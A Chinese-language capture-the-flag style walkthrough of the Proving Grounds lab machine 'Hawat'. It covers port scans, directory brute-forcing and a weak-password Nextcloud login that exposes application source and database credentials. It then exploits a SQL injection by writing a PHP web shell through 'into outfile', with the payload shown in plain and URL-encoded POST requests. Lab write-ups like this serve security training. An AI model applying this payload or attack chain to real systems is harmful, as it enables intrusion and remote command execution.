Hawat-Proving Grounds Practice
利用方法
nmap
- nmap 超快速扫描全端口
┌──(root㉿Learning)-[~]
└─# nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -p- 192.168.208.147
Warning: Your --min-parallelism option is pretty high! This can hurt reliability.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:14 CST
Initiating SYN Stealth Scan at 14:14
Scanning 192.168.208.147 [65535 ports]
Discovered open port 22/tcp on 192.168.208.147
Discovered open port 17445/tcp on 192.168.208.147
Discovered open port 30455/tcp on 192.168.208.147
192.168.208.147 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 14:14, 30.12s elapsed (1 host timed out)
Nmap scan report for 192.168.208.147
Host is up (0.14s latency).
Skipping host 192.168.208.147 due to host timeout
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds
Raw packets sent: 114701 (5.047MB) | Rcvd: 24 (1.040KB)- 慢速全端口
┌──(root㉿Learning)-[~]
└─# nmap -p- 192.168.208.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:16 CST
Nmap scan report for 192.168.208.147
Host is up (0.099s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
30455/tcp open unknown
50080/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 376.11 seconds- 详细信息扫描
┌──(root㉿Learning)-[~]
└─# nmap -p 22,111,139,443,445,17445,30455,50080 -sC -sV 192.168.208.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:25 CST
Nmap scan report for 192.168.208.147
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Mon, 26 Aug 2024 06:25:51 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Mon, 26 Aug 2024 06:25:51 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 26 Aug 2024 06:25:51 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
| http-methods:
|_ Potentially risky methods: TRACE
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port17445-TCP:V=7.94SVN%I=7%D=8/26%Time=66CC1FEF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,623,"HTTP/1\.1\x20200\x20\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Control:\x20no-
SF:cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPragma:\x20no-c
SF:ache\r\nExpires:\x200\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20t
SF:ext/html;charset=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Mon,\x
SF:2026\x20Aug\x202024\x2006:25:51\x20GMT\r\nConnection:\x20close\r\n\r\n\
SF:n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n\t<head>\n\x20\x20\x20\x20\
SF:t<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20\t<title>Issue\x20Tracker
SF:</title>\n\t\t<link\x20href=\"/css/bootstrap\.min\.css\"\x20rel=\"style
SF:sheet\"\x20/>\n\t</head>\n\t<body>\n\t\x20\x20\x20\x20<section>\n\t\t<d
SF:iv\x20class=\"container\x20mt-4\">\n\t\t\t<span>\n\x20\t\t\t\n\t\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<div>\n\t\x20\x20\x20\x20\x20\x20\x20\x20\t<a\
SF:x20href=\"/login\"\x20class=\"btn\x20btn-primary\"\x20style=\"float:rig
SF:ht\">Sign\x20In</a>\x20\n\t\x20\x20\x20\x20\x20\x20\x20\x20\t<a\x20href
SF:=\"/register\"\x20class=\"btn\x20btn-primary\"\x20style=\"float:right;m
SF:argin-right:5px\">Register</a>\n\t\x20\x20\x20\x20\x20\x20\x20\x20</div
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20</span>\n\t\t\t<br><br>\n\t\t\t<tabl
SF:e\x20class=\"table\">\n\t\t\t<thead>\n\t\t\t\t<tr>\n\t\t\t\t\t<th>ID</t
SF:h>\n\t\t\t\t\t<th>Message</th>\n\t\t\t\t\t<th>P")%r(HTTPOptions,12B,"HT
SF:TP/1\.1\x20200\x20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Contr
SF:ol:\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPragm
SF:a:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Options:\x20DENY\r\nContent-
SF:Length:\x200\r\nDate:\x20Mon,\x2026\x20Aug\x202024\x2006:25:51\x20GMT\r
SF:\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x2
SF:0\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20e
SF:n\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2026\x20Aug\x202024\x2006
SF::25:51\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x2
SF:0lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\
SF:x20Request</title><style\x20type=\"text/css\">body\x20{font-family:Taho
SF:ma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgro
SF:und-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px
SF:;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:
SF:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}
SF:</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x
SF:20Request</h1></body></html>");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.69 secondsdirsearch
- 50080端口站点
┌──(root㉿Learning)-[~/Desktop/tools/SpringBoot-Scan]
└─# dirsearch -u http://192.168.208.147:50080 -x 404
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/tools/SpringBoot-Scan/reports/http_192.168.208.147_50080/_24-08-26_14-30-13.txt
Target: http://192.168.208.147:50080/
[14:30:13] Starting:
[14:30:23] 301 - 239B - /4 -> http://192.168.208.147:50080/4/
[14:30:43] 301 - 243B - /cloud -> http://192.168.208.147:50080/cloud/
[14:30:44] 302 - 0B - /cloud/ -> http://192.168.208.147:50080/cloud/index.php/login
[14:30:48] 403 - 994B - /error/
[14:30:53] 200 - 1KB - /images/
[14:30:53] 301 - 244B - /images -> http://192.168.208.147:50080/images/- 17445端口站点
┌──(root㉿Learning)-[~]
└─# dirsearch -u http://192.168.208.147:17445 -x 404
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.208.147_17445/_24-08-26_14-30-00.txt
Target: http://192.168.208.147:17445/
[14:30:00] Starting:
[14:30:09] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[14:30:10] 400 - 435B - /a%5c.aspx
[14:30:42] 200 - 1KB - /login
[14:30:42] 302 - 0B - /logout -> http://192.168.208.147:17445/index
[14:30:53] 200 - 2KB - /register- 30455端口
- 就一个
phpinfo页面
┌──(root㉿Learning)-[/home/nosuger]
└─# dirsearch -u 192.168.208.147:30455 -x 404
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/nosuger/reports/_192.168.208.147_30455/_24-08-26_14-51-37.txt
Target: http://192.168.208.147:30455/
[14:51:37] Starting:
[14:51:45] 301 - 169B - /4 -> http://192.168.208.147:30455/4/
[14:52:21] 200 - 68KB - /phpinfo.php
image.png
- 这里能看到该phpinfo.php文件所在的路径为
/srv/http/phpinfo.php
image.png
访问
image.png根据报错页面猜测为Springboot
image.png
- 通过弱口令
admin/admin登录nextcloud
image.png
- 在nextcloud上发现了17445端口的
issuetracker站点源码
image.png
image.png
applocation.properties内容
spring.datasource.url=jdbc:mysql://localhost:3306/issue_tracker?serverTimeZone=UTC
spring.datasource.username=issue_user
spring.datasource.password=ManagementInsideOld797
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
spring.jpa.hibernate.ddl-auto=update
server.port=17445- 审计代码发现\issuetracker\src\main\java\com\issue\tracker\issues文件存在sql注入
@GetMapping("/issue/checkByPriority")
public String checkByPriority(@RequestParam("priority") String priority, Model model) {
//
// Custom code, need to integrate to the JPA
//
Properties connectionProps = new Properties();
connectionProps.put("user", "issue_user");
connectionProps.put("password", "ManagementInsideOld797");
try {
conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
System.out.println(query);
Statement stmt = conn.createStatement();
stmt.executeQuery(query);
} catch (SQLException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
// TODO: Return the list of the issues with the correct priority
List<Issue> issues = service.GetAll();
model.addAttribute("issuesList", issues);
return "issue_index";
}- 提示get请求不允许,尝试使用post
image.png
- 存在时间注入
POST /issue/checkByPriority?priority=a HTTP/1.1
Host: 192.168.208.147:17445
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=30088FF3AD052A6051D2780EE5703394
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: 208.54.104.184
X-Real-Ip: 208.54.104.184
image.png
- sql注入写shell
' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/shell.php' -- -POST /issue/checkByPriority?priority=%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%22%63%6d%64%22%5d%29%3b%20%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%73%72%76%2f%68%74%74%70%2f%73%68%65%6c%6c%2e%70%68%70%27%20%2d%2d%20%2d HTTP/1.1
Host: 192.168.208.147:17445
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=EC38F554A66AC8357BC260892A329708
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: 208.54.104.184
X-Real-Ip: 208.54.104.184
image.png